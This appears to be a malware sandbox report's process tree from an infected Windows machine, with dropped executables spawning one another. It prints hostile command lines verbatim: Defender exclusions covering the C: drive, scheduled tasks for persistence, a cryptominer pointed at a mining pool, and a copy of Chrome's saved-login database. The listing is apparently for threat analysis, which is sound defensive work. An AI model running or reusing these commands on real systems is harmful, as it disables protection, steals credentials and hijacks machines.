C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1704,16901904395509383887,11355396258001114189,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6340_1893534847" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2556 /prefetch:111⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1704,16901904395509383887,11355396258001114189,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6340_1893534847" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3232 /prefetch:211⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1704,16901904395509383887,11355396258001114189,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6340_1893534847" --mojo-platform-channel-handle=1764 /prefetch:811⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1704,16901904395509383887,11355396258001114189,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6340_1893534847" --mojo-platform-channel-handle=444 /prefetch:811⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1704,16901904395509383887,11355396258001114189,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6340_1893534847" --mojo-platform-channel-handle=3364 /prefetch:811⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1704,16901904395509383887,11355396258001114189,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6340_1893534847" --mojo-platform-channel-handle=3520 /prefetch:811⤵
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1704,16901904395509383887,11355396258001114189,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6340_1893534847" --mojo-platform-channel-handle=1328 /prefetch:811⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\Pictures\Adobe Films\3J_va4pe9jsKoBYvR7XCIGWt.exe"C:\Users\Admin\Pictures\Adobe Films\3J_va4pe9jsKoBYvR7XCIGWt.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\G2SeuVlT_4f8Mi_wB6hXVjTY.exe"C:\Users\Admin\Pictures\Adobe Films\G2SeuVlT_4f8Mi_wB6hXVjTY.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\27faf92a-a2a2-44f0-82be-107c48e94735\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\27faf92a-a2a2-44f0-82be-107c48e94735\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\27faf92a-a2a2-44f0-82be-107c48e94735\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run7⤵
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\27faf92a-a2a2-44f0-82be-107c48e94735\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\27faf92a-a2a2-44f0-82be-107c48e94735\AdvancedRun.exe" /SpecialRun 4101d8 20568⤵
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\Pictures\Adobe Films\G2SeuVlT_4f8Mi_wB6hXVjTY.exe" -Force7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\G2SeuVlT_4f8Mi_wB6hXVjTY.exe"C:\Users\Admin\Pictures\Adobe Films\G2SeuVlT_4f8Mi_wB6hXVjTY.exe"7⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\G2SeuVlT_4f8Mi_wB6hXVjTY.exe"C:\Users\Admin\Pictures\Adobe Films\G2SeuVlT_4f8Mi_wB6hXVjTY.exe"7⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\AE0rs6nsRbfxKCxE5pGiPBfU.exe"C:\Users\Admin\Pictures\Adobe Films\AE0rs6nsRbfxKCxE5pGiPBfU.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5468 -s 10127⤵
- Program crash
-
-
-
C:\Users\Admin\Pictures\Adobe Films\7L_81wUHCOTZRFbmV7tSHRAj.exe"C:\Users\Admin\Pictures\Adobe Films\7L_81wUHCOTZRFbmV7tSHRAj.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 7L_81wUHCOTZRFbmV7tSHRAj.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\7L_81wUHCOTZRFbmV7tSHRAj.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 7L_81wUHCOTZRFbmV7tSHRAj.exe /f8⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\2KrB0EVqmPXvx3GaXcpyjsqG.exe"C:\Users\Admin\Pictures\Adobe Films\2KrB0EVqmPXvx3GaXcpyjsqG.exe"6⤵
-
-
C:\Users\Admin\Pictures\Adobe Films\6uL_Ig3jT51HFqCfaYsX7Gwm.exe"C:\Users\Admin\Pictures\Adobe Films\6uL_Ig3jT51HFqCfaYsX7Gwm.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5244 -s 6567⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5244 -s 6727⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5244 -s 6767⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5244 -s 6647⤵
- Program crash
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0971aafeebb6f.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue0971aafeebb6f.exeTue0971aafeebb6f.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue093cbcf0222440.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0956c36b51.exe /mixone4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0990c8b597f.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue091e2054cef7.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0947ef38552fc.exe4⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c6db969ab9.exe4⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue0956c36b51.exeTue0956c36b51.exe /mixone1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 6642⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 6722⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 6762⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 7082⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 8922⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 9802⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2648 -s 11042⤵
- Program crash
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue091e2054cef7.exeTue091e2054cef7.exe1⤵
- Executes dropped EXE
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Dzpafigaxd.vbs"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google\Qekdqa.exe'3⤵
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dzpafigaxd.vbs"2⤵
-
C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"C:\Users\Admin\AppData\Local\Temp\Fphrgjtnjgrqbtrochalunsaintly_2021-10-24_21-38.exe"3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\MSBuild.exeC:\Users\Admin\AppData\Local\Temp\MSBuild.exe2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com3⤵
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vhhrflxpr.vbs"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\4⤵
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o rx.unmineable.com:3333 a rx -k -u ETC:0xb0f43eE68f616bc263CCD517Be03329365dfe5E0.RIG02 -p x3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue093cbcf0222440.exeTue093cbcf0222440.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue093cbcf0222440.exe"C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue093cbcf0222440.exe" -u2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue0990c8b597f.exeTue0990c8b597f.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-5FLO2.tmp\Tue0990c8b597f.tmp"C:\Users\Admin\AppData\Local\Temp\is-5FLO2.tmp\Tue0990c8b597f.tmp" /SL5="$70048,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue0990c8b597f.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue09c1731fe55c7.exeC:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue09c1731fe55c7.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue09c6db969ab9.exeC:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue09c6db969ab9.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue0990c8b597f.exe"C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue0990c8b597f.exe" /SILENT1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-GH2JA.tmp\Tue0990c8b597f.tmp"C:\Users\Admin\AppData\Local\Temp\is-GH2JA.tmp\Tue0990c8b597f.tmp" /SL5="$80048,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue0990c8b597f.exe" /SILENT2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-V5G74.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-V5G74.tmp\postback.exe" ss13⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue0947ef38552fc.exeTue0947ef38552fc.exe1⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Public\run.exeC:\Users\Public\run.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 2603⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
-
-
C:\Users\Public\run2.exeC:\Users\Public\run2.exe2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC15F34E5\Tue09c6db969ab9.exeTue09c6db969ab9.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
- Executes dropped EXE
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\SysWOW64\netsh.exe"1⤵
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\Pictures\Adobe Films\2KrB0EVqmPXvx3GaXcpyjsqG.exe"2⤵
-
-
C:\Windows\SysWOW64\cmd.exe/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V2⤵
-
-
C:\Program Files\Mozilla Firefox\Firefox.exe"C:\Program Files\Mozilla Firefox\Firefox.exe"2⤵
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\EBDE.exeC:\Users\Admin\AppData\Local\Temp\EBDE.exe1⤵
-
C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"2⤵
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 9AD9945278C9CBB56E3B40324F273507 C2⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3A5E206F8C27569670B3A59240061F39 C2⤵
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 5AEAE0C437694615323B9CAD39A25D9D2⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe"2⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe" -silent=1 -CID=778 -SID=778 -submn=default3⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" "--iUSIg"4⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exeC:\Users\Admin\AppData\Roaming\Settings\Settings.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Settings\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Settings\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Settings\User Data" --annotation=plat=Win64 --annotation=prod=Settings --annotation=ver=0.0.13 --initial-client-data=0x350,0x354,0x358,0x32c,0x35c,0x7ff99849dec0,0x7ff99849ded0,0x7ff99849dee05⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1820,17907188507810970003,15325025937366167059,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6512_737600880" --mojo-platform-channel-handle=1900 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1820,17907188507810970003,15325025937366167059,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6512_737600880" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2400 /prefetch:15⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1820,17907188507810970003,15325025937366167059,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6512_737600880" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2604 /prefetch:15⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1820,17907188507810970003,15325025937366167059,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6512_737600880" --mojo-platform-channel-handle=1884 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1820,17907188507810970003,15325025937366167059,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6512_737600880" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1840 /prefetch:25⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1820,17907188507810970003,15325025937366167059,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6512_737600880" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3156 /prefetch:25⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1820,17907188507810970003,15325025937366167059,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6512_737600880" --mojo-platform-channel-handle=3236 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1820,17907188507810970003,15325025937366167059,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6512_737600880" --mojo-platform-channel-handle=2672 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1820,17907188507810970003,15325025937366167059,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6512_737600880" --mojo-platform-channel-handle=3628 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1820,17907188507810970003,15325025937366167059,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6512_737600880" --mojo-platform-channel-handle=1996 /prefetch:85⤵
-
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1820,17907188507810970003,15325025937366167059,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6512_737600880" --mojo-platform-channel-handle=2556 /prefetch:85⤵
-
-
-
-
